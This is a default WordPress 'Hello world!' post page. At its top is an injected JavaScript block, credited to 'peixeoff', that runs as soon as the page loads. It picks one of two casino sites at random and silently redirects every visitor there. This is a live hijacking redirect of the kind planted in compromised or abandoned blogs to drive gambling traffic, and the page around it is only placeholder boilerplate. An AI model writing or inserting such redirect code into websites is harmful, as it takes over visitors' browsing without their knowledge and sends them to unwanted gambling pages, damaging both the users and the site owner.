<script>
    // Lista de destinos
    const links = [
        "https://cassino1.com",
        "https://cassino2.com"
    ];

    // Escolhe um aleatório
    const destino = links[Math.floor(Math.random() * links.length)];

    // Redireciona
    window.location.href = destino;
</script>

Autor: peixeoff


  • Hello world!

    Hello world!

    Welcome to WordPress. This is your first post. Edit or delete it, then start writing!